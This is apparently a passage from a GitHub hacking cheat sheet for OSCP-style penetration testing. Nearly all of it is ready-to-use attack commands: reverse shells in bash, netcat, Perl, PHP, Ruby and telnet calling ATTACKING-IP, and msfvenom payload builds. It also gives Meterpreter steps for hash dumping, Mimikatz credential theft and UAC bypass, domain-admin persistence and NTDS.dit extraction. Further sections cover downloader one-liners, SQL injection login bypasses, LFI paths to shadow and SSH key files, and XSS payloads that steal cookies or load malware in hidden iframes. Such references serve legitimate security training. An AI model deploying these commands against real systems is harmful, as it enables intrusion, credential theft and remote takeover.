    aircrack-ng -w wordlist.txt -b MAC_OF_THE_NETWORK CAPTUREFILE #could be done also with hashcat
    #phone numbers are very common as a password
    

Shells & Reverse Shells

SUID C Shells

  • bin/bash:
int main(void){

setresuid(0, 0, 0);

system("/bin/bash");

}
  • bin/sh:
int main(void){

setresuid(0, 0, 0);

system("/bin/sh");

}

TTY Shell:

python -c 'import pty;pty.spawn("/bin/bash")' #Python TTY Shell Trick
echo os.system('/bin/bash')
/bin/sh –i #Spawn Interactive sh shell
execute('/bin/sh')
  • LUA
!sh
  • Privilege Escalation via nmap
:!bash
  • Privilege escalation via vi

Fully Interactive TTY

                                In reverse shell 
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
                                In Attacker console
stty -a
stty raw -echo
fg
                                In reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>

Spawn Ruby Shell

exec "/bin/sh"
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d

Netcat

nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

PHP

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
  • (Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6)

Bash

exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done
# or: while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

Perl

exec "/bin/sh";
perl —e 'exec "/bin/sh";'
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  • Windows
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Meterpreter (Metasploit) (cheet sheet)

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcp
  • Windows reverse tcp payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcpf
  • Meterpreter Windows VNC Payload
set ViewOnly false

Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp
  • Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

upload file c:\\windows
  • Meterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmp
  • Meterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmp
  • Meterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exe
  • Meterpreter run .exe on target – handy for executing uploaded exploits
execute -f cmd -c
  • Creates new channel with cmd shell
ps
  • Meterpreter show processes
shell
  • Meterpreter get shell on the target
getsystem
  • Meterpreter attempts priviledge escalation the target
hashdump
  • Meterpreter attempts to dump the hashes on the target (must have privileges; try migrating to winlogon.exe if possible first)
portfwd add –l 3389 –p 3389 –r target
  • Meterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r target
  • Meterpreter delete port forward
use exploit/windows/local/bypassuac
  • Bypass UAC on Windows 7 + Set target + arch, x86/64
use auxiliary/scanner/http/dir_scanner
  • Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan
  • Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login
  • Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version
  • Metasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_login
  • Metasploit Oracle Login Module
use exploit/multi/script/web_delivery
  • Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell
  • Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer
  • Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload
  • Metasploit MSSQL payload
run post/windows/gather/win_privs
  • Metasploit show privileges of current user
use post/windows/gather/credentials/gpp
  • Metasploit grab GPP saved passwords
load kiwi
creds_all
  • Metasploit load Mimikatz/kiwi and get creds
run post/windows/gather/local_admin_search_enum
  • Idenitfy other machines that the supplied domain user has administrative access to
set AUTORUNSCRIPT post/windows/manage/migrate

Meterpreter Payloads

msfvenom –l
  • List options

Binaries

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

Web Payloads

msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php
  • PHP
set payload php/meterpreter/reverse_tcp
  • Listener
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
  • PHP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
  • ASP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
  • JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
  • WAR

Scripting Payloads

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
  • Python
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
  • Bash
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
  • Perl

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f

Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -z

An example is:

msfvenom exploit/multi/handler -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f > exploit.extension

Powershell

Execution Bypass

Set-ExecutionPolicy Unrestricted
./file.ps1
Import-Module script.psm1
Invoke-FunctionThatIsIntheModule
iex(new-object system.net.webclient).downloadstring(“file:///C:\examplefile.ps1”)

Powershell.exe blocked

Use ‘not powershell’ [https://github.com/Ben0xA/nps](https://github.com/Ben0xA/nps)

Persistence

net user username "password" /ADD
net group "Domain Admins" %username% /DOMAIN /ADD

Gather NTDS.dit file

ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit

SQLInjections

Common Injections for Login Forms:

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1—

Uploading Files to Target Machine

TFTP

#TFTP Linux: cat /etc/default/atftpd to find out file serving location; default in kali /srv/tftp
service atftpd start

# Windows
tftp -i $ATTACKER get /download/location/file /save/location/file

FTP

# Linux: set up ftp server with anonymous logon access;
twistd -n ftp -p 21 -r /file/to/serve

# Windows shell: read FTP commands from ftp-commands.txt non-interactively;
echo open $ATTACKER>ftp-commands.txt
echo anonymous>>ftp-commands.txt
echo whatever>>ftp-commands.txt
echo binary>>ftp-commands.txt
echo get file.exe>>ftp-commands.txt
echo bye>>ftp-commands.txt 
ftp -s:ftp-commands.txt

# Or just a one-liner
(echo open 10.11.0.245&echo anonymous&echo whatever&echo binary&echo get nc.exe&echo bye) > ftp.txt & ftp -s:ftp.txt & nc.exe 10.11.0.245 443 -e cmd

CertUtil (download file from windows)

certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe
me

PHP

<?php file_put_contents("/var/tmp/shell.php", file_get_contents("http://10.11.0.245/shell.php")); ?>

Python

python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')"

HTTP: Powershell

python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')"

HTTP: Linux

wget http://$ATTACKER/file
curl http://$ATTACKER/file -O
scp ~/file/file.bin user@$TARGET:tmp/backdoor.py

NetCat

# Attacker
nc -l -p 4444 < /tool/file.exe

# Victim
nc $ATTACKER 4444 > file.exe

Web Application

LFI (Local File Inclusion)

if we found an LFI, we can check each of those paths,

we can use burpsuite intruder to see all Useful LFI files Linux /etc/passwd /etc/shadow /etc/issue /etc/group /etc/hostname /etc/ssh/ssh_config /etc/ssh/sshd_config /root/.ssh/id_rsa /root/.ssh/authorized_keys /home/user/.ssh/authorized_keys /home/user/.ssh/id_rsa /proc/[0-9]/fd/[0-9] /proc/mounts /home/$USER/.bash_history /home/$USER/.ssh/id_rsa /var/run/secrets/kubernetes.io/serviceaccount /var/lib/mlocate/mlocate.db /var/lib/mlocate.db Apache /etc/apache2/apache2.conf /usr/local/etc/apache2/httpd.conf /etc/httpd/conf/httpd.conf Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log Debian/Ubuntu -> /var/log/apache2/access.log FreeBSD -> /var/log/httpd-access.log /var/log/apache/access.log /var/log/apache/error.log /var/log/apache2/access.log /var/log/apache/error.log MySQL /var/lib/mysql/mysql/user.frm /var/lib/mysql/mysql/user.MYD /var/lib/mysql/mysql/user.MYI Windows /boot.ini /autoexec.bat /windows/system32/drivers/etc/hosts /windows/repair/SAM /windows/panther/unattended.xml /windows/panther/unattend/unattended.xml /windows/system32/license.rtf /windows/system32/eula.txt

Situation

http://<target>/index.php?parameter=value

How to Test

http://<target>/index.php?parameter=php://filter/convert.base64-encode/resource=index

http://<target>/script.php?page=../../../../../../../../etc/passwd
OR
http://<target>/script.php?page=..//..//..//..//..//..//../etc/passwd
OR
curl http://<target>/script.php?page=..//..//..//..//..//..//../etc/passwd

http://<target>/script.php?page=../../../../../../../../boot.ini

LFI Payloads

XSS

Reflected

Simple test

This is a simple test to see what happens, this is not a prove that the field is vuln to xss

<plaintext>

Simple XSS test

<script>alert('Found')</script>

"><script>alert(Found)</script>">

<script>alert(String.fromCharCode(88,83,83))</script>

Bypass filter of tag script

" onload="alert(String.fromCharCode(88,83,83))

" onload="alert('XSS')

bla is not a valid image, so this cause an error

<img src='bla' onerror=alert("XSS")>

Persistent

document.body.innerHTML="<style>body{visibility:hidden;}</style>

HACKED!

";

PHP collector

> cookie.txtchmod 777 cookie.txt

edit a php page like colector.php as follow:

Script to put in page:

new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+document.cookie;</script>

Malware Donwloader via XSS

<iframe src="http://OUR_SERVER_IP/OUR_MALWARE" height="0" width="0"></iframe>

How to play Mario with XSS

<iframe src="https://jcw87.github.io/c2-smb1/" width="100%" height="600"></iframe>

XSS payloads

MySql Cheat Sheet

mysql -u [username] -p; #connect, you will be asked for password
SHOW DATABASES;
use DB_NAME;
SHOW TABLES;
select * from TABLE;

MySQL cheatsheet

MySQL Cheat Sheet

Misc

Linux file permissions

Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%202.png

Linux Cheat Sheet

Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%203.png

Hacking Cheat Sheets

Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%204.png

Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%205.png

vi cheat sheet

Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%206.png

find cheat sheet

Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%207.png

Simple Local Web Servers

Python local web server command, handy for serving up shells and exploits on an attacking machine.

python -m SimpleHTTPServer 80
python3 -m http.server
python -m pyftpdlib -p 21 #start a local ftp server with anonymous:anonymouscer

updog

ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"

php -S 0.0.0.0:80

Hash Examples

Likely just use hash-identifier for this but here are some example hashes:

Untitled

Text Manipulation

awk - command-line text manipulation dynamo

awk -F: '{print $1,$6}' /etc/passwd
    $0: Represents the entire line of text.
    $1: Represents the first field.
    $2: Represents the second field.
    $7: Represents the seventh field.
    $45: Represents the 45th field.
    $NF: Stands for “number of fields,” and represents the last field.
    -F (separator string)

Sublime Text Editor

Splitting the Selection into Lines

Select a block of lines, and then split it into many selections, one per line, using:

    Windows/Linux: Ctrl+Shift+L

sed cheat sheet

https://s3.studylib.net/store/data/008266685_1-65c7d170c2600d5fd58feafc3611414f.png

Useful links

A cheat-sheet for password crackers

Penetration testing and webapp cheat sheets

The Ultimate List of SANS Cheat Sheets

coreb1t/awesome-pentest-cheat-sheets

Penetrating Testing/Assessment Workflow

0DAYsecurity.com - The fastest resource to a proactive security

OSCP Ultimate CheatSheet - ByteFellow

Linux Privilege Escalation CheatSheet for OSCP - ByteFellow

Windows Privilege Escalation Cheatsheet for OSCP - ByteFellow

Cheat Sheet

CountablyInfinite/oscp_cheatsheet

OSCP: Developing a Methodology

Passing OSCP

swisskyrepo/PayloadsAllTheThings

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Shell 100.0%